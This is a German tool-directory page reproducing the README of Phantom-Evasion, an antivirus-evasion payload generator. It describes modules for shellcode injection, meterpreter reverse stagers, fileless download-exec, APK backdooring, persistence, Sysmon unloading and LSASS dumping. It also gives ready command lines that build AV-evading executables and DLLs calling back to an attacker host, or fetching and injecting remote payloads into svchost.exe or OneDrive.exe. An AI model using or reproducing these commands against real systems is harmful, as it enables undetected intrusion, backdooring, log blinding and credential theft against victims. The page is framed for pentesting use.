Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Phantom-Evasion — Python antivirus evasion tool | Kitploit
Tools/GitHubGitHub/oddcod3/phantom-evasion
Privilege EscalationDynamic Analysis (Sandboxing)Exploit FrameworksPayload GenerationPersistence MechanismsShellcodePost-ExploitationShellcode GenerationPayload DevelopmentArchived
GitHuboddcod3/phantom-evasion

Phantom-Evasion

1.4k340vor 2 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Python antivirus evasion tool

Repository anzeigen

PHANTOM EVASION 3.0

Phantom-Evasion ist ein Antivirus-Umgehungstool, geschrieben in Python (kompatibel mit Python und Python3), das in der Lage ist, (fast) vollständig unerkannte ausführbare Dateien zu erstellen, selbst mit den gängigsten x86-msfvenom-Payloads.

Die folgenden Betriebssysteme unterstützen offiziell die automatische Einrichtung:

  1. Kali Linux
  2. Parrot Security

Die folgenden Betriebssysteme unterstützen wahrscheinlich die automatische Einrichtung, erfordern jedoch eine manuelle Installation von Metasploit-Framework:

  1. OSX (getestet auf Catalina)
  2. Ubuntu
  3. Linux Mint
  4. Elementary
  5. Deepin
  6. andere Debian-Distributionen
  7. Centos
  8. Fedora
  9. Blackarch

Die folgenden Betriebssysteme erfordern eine manuelle Einrichtung:

  1. Windows 10

Einfach git clone oder herunterladen und den Phantom-Evasion-Ordner entpacken.

Einrichtung:

Automatische Einrichtung, öffne ein Terminal und führe aus:

root@kitploit:~
python3 phantom-evasion.py --setup

oder:

root@kitploit:~
chmod +x ./phantom-evasion.py

./phantom-evasion.py --setup

oder starte phantom-evasion im interaktiven Modus und wähle Option 7

Abhängigkeiten (nur für manuelle Einrichtung)

  1. metasploit-framework
  2. mingw-w64 (cygwin unter Windows)
  3. gcc-multilib
  4. apktool
  5. apksigner
  6. strip
  7. osslsigncode

CMDLINE/INTERAKTIV:

  1. Starte phantom-evasion im interaktiven Modus:
root@kitploit:~
python3 phantom-evasion.py

oder:

root@kitploit:~
./phantom-evasion.py
  1. Um die Optionen des Befehlszeilenmodus zu sehen:
root@kitploit:~
python3 phantom-evasion.py --help

oder:

root@kitploit:~
./phantom-evasion.py --help

WINDOWS-Module

-Jedes Windows-Payload-C-Modul kann (sowohl x86 als auch x64 unterstützt) als EXE oder DLL/ReflectiveDLL kompiliert werden.

-Randomisierte Junkcode-Einschleusung (Intensität, Häufigkeit und Wahrscheinlichkeit der Wiedereinschleusung können eingestellt werden) sowie Windows-Antivirus-Umgehungstechniken (Häufigkeit einstellbar).

-Multibyte-Xor/Vigenere-Verschlüsselung von Shellcode/Datei wird sowohl in den Modulen Shellcode-Injection als auch Download-Exec unterstützt.

-Ntdll-UnhookApi und Peb-Prozess-Masquerading-Technik werden unterstützt.

-Große Auswahl an Ausführungsmodi (sowohl lokal als auch remote).

-Große Auswahl an Speicherzuweisungsmodi für Payloads (Virtual_RWX, Virtual_RW/RX, Virtual_RW/RWX, Heap_RWX).

-Dynamisches Laden von Windows-APIs kann eingestellt werden.

-Zertifikats-Spoofer und -Signierer werden unterstützt.

-Ausführbare Datei strippen (https://en.wikipedia.org/wiki/Strip_(Unix))

Windows C Shellcode Injection

Msfvenom-Windows-Payloads und benutzerdefinierte Shellcodes werden unterstützt. Shellcode kann als Ressource gespeichert und zur Laufzeit mit der FindResource-API abgerufen werden.

Shellcode-Verschlüsselung unterstützt:

root@kitploit:~
1.keine

2.Multibyte-Xor

3.Doppelschlüssel-Multibyte-Xor

4.Vigenere

5.Doppelschlüssel-Vigenere
  1. Lokale Ausführungsmethode kann eine der folgenden sein:

    Thread

    APC

    Lokaler Speicherzuweisungsmodus kann einer der folgenden sein:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

  2. Remote-Ausführungsmethode kann eine der folgenden sein:

    ThreadExecutionHijack (kurz TEH)

    Processinject (kurz PI)

    APCSpray (kurz APCS)

    EarlyBird (kurz EB)

    EntryPointHijack (kurz EPH)

    Remote-Speicherzuweisungsmodus kann einer der folgenden sein:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

Windows Pure C-Meterpreter-Stager (C)

Pure C-Meterpreter-Stager-Module (TCP/HTTP/HTTPS), kompatibel mit msfconsole und Cobalt-Strike-Beacon. (reverse_tcp/reverse_http/reverse_https)

Verwendung des Befehlszeilenmodus:

root@kitploit:~
reverse_tcp c stager ist WRT

reverse_http c stager ist WRH

reverse_https c stager ist WRS
  1. Lokale Ausführungsmethode kann eine der folgenden sein:

    Thread

    APC

    Lokaler Speicherzuweisungsmodus kann einer der folgenden sein:

    Virtual_RWX

    Virtual_RW/RX

    Virtual_RW/RWX

    Heap_RWX

Windows C Download-Exec NoDiskWrite

Lade exe/dll von der angegebenen URL in den Speicher herunter und führe sie aus/lade sie in einen entfernten Prozess (ohne auf die Festplatte zu schreiben).

Verschlüsselter EXE/DLL-Download unterstützt:

root@kitploit:~
1.keine
                                 
2.Multibyte-Xor
                                 
3.Doppelschlüssel-Multibyte-Xor
                               
4.Vigenere
                                
5.Doppelschlüssel-Vigenere

Die verschlüsselte DLL/EXE wird als ursprünglicher Dateiname + "crypt" + ".dll" oder ".exe" gespeichert – dies ist die herunterzuladende Datei.

  1. Windows DownloadExecExe NoDiskWrite (WDE im Befehlszeilenmodus):

    Remote-Ausführungsmethode kann eine der folgenden sein:

    ProcessHollowing (kurz PH)

  2. Windows DownloadExecDll NoDiskWrite (WDD im Befehlszeilenmodus):

    Remote-Lademethode kann eine der folgenden sein:

    ReflectiveDll (kurz RD)

    RDAPC (ReflectiveDllAPC)

    ManualMap (kurz MM) ---> nur x86

LINUX-PAYLOADS

Linux Shellcode Injection Module (C)

Msfvenom-Linux-Payloads und benutzerdefinierte Shellcodes werden unterstützt.

ANDROID-PAYLOADS

  1. Android Msfvenom Obfuscate Backdoor:

    Verschleiere msfvenom-Payloads und erstelle sie neu (smali/baksmali) mit apktool. Der verschleierte Payload kann verwendet werden, um legitime APK-Dateien zu backdoorieren.

PERSISTENZ-Module

  1. Windows Persistence RegCreateKeyExW Registry-Key hinzufügen (C) Die kompilierte ausführbare Datei muss auf das Zielgerät hochgeladen und ausgeführt werden, wobei der vollständige Pfad zur Datei, die zum Start hinzugefügt werden soll, als Argument übergeben wird.

  2. Windows Persistence REG Registry-Key hinzufügen (CMD) Dieses Modul generiert Persistenz-Befehlszeilen-Payloads (Registry-Key mit REG.exe hinzufügen).

  3. Windows Persistence Keep Process Alive (C) Die kompilierte ausführbare Datei muss auf das Zielgerät hochgeladen und ausgeführt werden. Verwendet CreateToolSnapshoot, ProcessFirst und ProcessNext, um alle X Sekunden zu prüfen, ob der angegebene Prozess läuft (falls nicht, wird ein neuer Prozess mit der WinExec-API erstellt).

  4. Windows Persistence Schtasks (CMD)

    Dieses Modul generiert Persistenz-Befehlszeilen-Payloads (mit Schtasks.exe).

  5. Windows Persistence Create Service (CMD)

    Dieses Modul generiert Persistenz-Befehlszeilen-Payloads (mit sc.exe).

PRIVILEGE ESCALATION-Module

  1. Windows DuplicateTokenEx (C)

    Erstelle einen neuen Prozess mit einem von einem anderen Prozess geklonten Token. Die kompilierte ausführbare Datei muss auf das Zielgerät hochgeladen und ausgeführt werden.

POSTEXPLOITATION-Module

  1. Windows Unload Sysmon (C) Entlade den Sysmon-Treiber, was dazu führt, dass das System die Aufzeichnung von Sysmon-Ereignisprotokollen stoppt. Die kompilierte ausführbare Datei muss auf das Zielgerät hochgeladen und ausgeführt werden.

  2. Windows Unload Sysmon (CMD) Entlade den Sysmon-Treiber, was dazu führt, dass das System die Aufzeichnung von Sysmon-Ereignisprotokollen stoppt.

  3. Windows Attrib hide file (CMD) Verwende attrib, um eine Datei zu verstecken

  4. Windows SetFileAttribute hidden (C) Verstecke eine Datei mit der SetFileAttribute-API. Die kompilierte ausführbare Datei muss auf das Zielgerät hochgeladen und ausgeführt werden.

  5. Windows DumpLsass (C) Dump Lsass mit der MiniWriteDumpWrite-API. Die kompilierte ausführbare Datei muss auf das Zielgerät hochgeladen und ausgeführt werden.

  6. Windows DumpLsass (CMD)

    Dump Lsass von der Befehlszeile aus.

Phantom-Evasion Befehlszeilenmodus-Beispiele:

  1. Windows-Shellcode-Injection, Ausgabe als signierte EXE mit gefälschtem HTTPS-Zertifikat, lokale Ausführungsmethode: Thread, Speicher: Virtual_RWX, Verschlüsselung: Vigenere
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 192.168.1.123 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o filename.exe
  1. Windows x64-Shellcode-Injection, Ausgabe als reflective DLL, Remote-Ausführungsmethode: ProcessInject (PI), Speicher: Virtual_RW/RX, Zielprozess: SkypeApp.exe, Verschlüsselung: Doppelschlüssel-Xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp SkypeApp.exe -i PI -e 3 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -R -o filename.dll
  1. Windows x64-Shellcode-Injection, Ausgabe als gestrippte DLL, Shellcode als Ressource gespeichert, Remote-Ausführungsmethode: EarlyBird (EB), Speicher: Virtual_RW/RX, Zielprozess: svchost.exe, Verschlüsselung: Xor
root@kitploit:~
python3 phantom-evasion.py -m WSI -msfp windows/x64/meterpreter/reverse_tcp -a x64 -H 192.168.1.123 -P 4444 -tp svchost.exe -i EB -e 2 -mem Virtual_RW/RX -j 1 -J 15 -jr 0 -E 5 -f dll -res -S -o filename.dll
  1. Windows x64 reverse https Stager, Ausgabe als gestrippte DLL, lokale Ausführungsmethode: Thread, Speicher: Heap_RWX
root@kitploit:~
python3 phantom-evasion.py -m WRS -a x64 -H 192.168.1.123 -P 4444 -i Thread -mem Heap_RWX -j 1 -J 15 -jr 0 -E 5 -f dll -S -o filename.dll
  1. Windows x86 downloadexec DLL, Ausgabe als gestrippte EXE, Remote-Ausführungsmethode: ManualMap (MM), Zielprozess: OneDrive.exe, Downloadgröße 1000000 Bytes
root@kitploit:~
python3 phantom-evasion.py -m WDD -U http://192.168.1.123/payload.dll -i MM -tp OneDrive.exe -ds 1000000  -j 10 -J 10 -jr 0 -E 10 -f exe -S -o filename.exe

  1. Windows x64 downloadexec EXE, Ausgabe als gestrippte reflective DLL, Remote-Ausführungsmethode: ProcessHollowing (PH), Zielprozess: svchost.exe, Downloadgröße 1000000 Bytes
root@kitploit:~
python3 phantom-evasion.py -m WDE -U http://192.168.1.123/payloadcrypt.exe -e 4 -ef payload.exe -i PH -tp svchost.exe -ds 1000000  -j 1 -J 5 -jr 0 -E 3 -f dll -R -S -o filename.dll

Lizenz

GPLv3.0

Danksagungen und nützliche Ressourcen

https://github.com/stephenfewer/ReflectiveDLLInjection

https://github.com/rsmudge/metasploit-loader

https://ired.team

https://github.com/theevilbit/injection

http://www.rohitab.com/discuss/topic/40761-manual-dll-injection/

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf

Tool herunterladen